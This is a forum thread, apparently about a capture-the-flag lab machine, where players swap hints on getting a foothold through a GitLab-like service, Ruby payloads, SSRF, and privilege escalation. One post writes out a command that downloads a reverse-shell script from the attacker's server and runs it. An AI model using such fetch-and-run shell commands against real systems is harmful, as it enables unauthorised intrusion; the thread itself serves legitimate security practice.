Official Laboratory Discussion

Hmm, I leaked the secret, but I can’t get r*** to run my payload. I tried adding spaces to remove the ='s as 0xc45 suggested, but still no luck. Any tips?

Stuck on the foothold. I’ve found the g** URL and made an account. I can create a project and get it to call a r****r on my local g***** instance, but I haven’t found a way to turn this into anything yet. I searched for CVEs but haven’t found any that are useful. As usual, I may have missed something obvious?

Rooted :wink:

That was an easy box?
I don’t think so…
Thanks, @n3ph0s for the nudge on foothold.

Feel free to PM if any help is needed.

Guys, I’m stuck at the beginning. Can someone DM me a hint to start with? I did a service scan and I can’t get anywhere on the website.

Rooted!

Why am I so distracted and overlooking things???
Contrary to everyone else, the user was easier than the root!

Might be luck, but things just went the right path (even without having used docker prior to this)…

foot:

  • look carefully (enumeration)
  • Some things (do… cof… mains) are just a pot full of honey…
  • find the version and build piece by piece with that (find that POC)
  • When exploiting, if the payload fails, check what was said about the “=” symbols (I did not have that issue though)
  • Also remember what was said: the machine might not have the bins you want/need

user:

  • It was already mentioned (if you can’t crack/find, just hammer the guts and reset the machine!)

root:

  • Enum (latest) might help you over Peas on this one
  • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

If nudges are needed, honk the horn on PM

Thought I’d have a nice little time on this box, but it seems to be 502’ing everything for me after stops/starts/resets :frowning:

Edit: I had to change servers for it to work.

I actually got a shell but have no idea how to find the user flag.

Please send me some nudges.

I’ve reached the gi**ab page, registered an account, and discovered the L_I, but I can’t understand how to get R_E. I’ve read about ss*f, but it says the import URL is blocked. Am I on the right path? I’m blocked…

Spoiler Removed

This box made me sweat. There are still some mysteries that I have not solved, like why some payloads work for one person and not for another…

I spent a lot of time setting up the env

it is not an easy box for me

If you need help, PM me.

Yikes, this is not an easy box for me.

I thought I had some plain Ruby working for generating the payload, but it’s just not accepted. The ‘other’, more convoluted doc*** route has also failed to generate a payload which works.

Hint for those struggling with a foothold: If you get a “Something went wrong” error, try a different bin

What I suggest for those with payload problems: download a shell script from your local Python http.server to perform the reverse shell; special symbols may cause problems.

This approach worked well for me: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

Trying the bash rev shell directly did not work for me, and the one I mentioned above was reliable every time (I used it like 6 times due to resets and stuff).

Having zero luck getting the payload to hit a local web server. This one has bested me.

@trcm said:

Having zero luck getting the payload to hit a local web server. This one has bested me.

How are you generating it??

I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone Ruby script.

Aha, progress. I had to add "--timeout=3 --tries=1", as wget wasn’t reaching my web service and was executing in place on the Rails console, borking the ERB instance it seems.

Rooted. The hardest part was finding the foothold. Thanks @siurana for the nudge. After finding an article with the right path, the rest was straightforward. Thanks @0xc45 for a fun box!

Alright, I think I know the vulnerability, but can someone help me with how to exploit it?

I can’t for the life of me find the user flag, I’ve been searching for over 4 hours. Any nudges?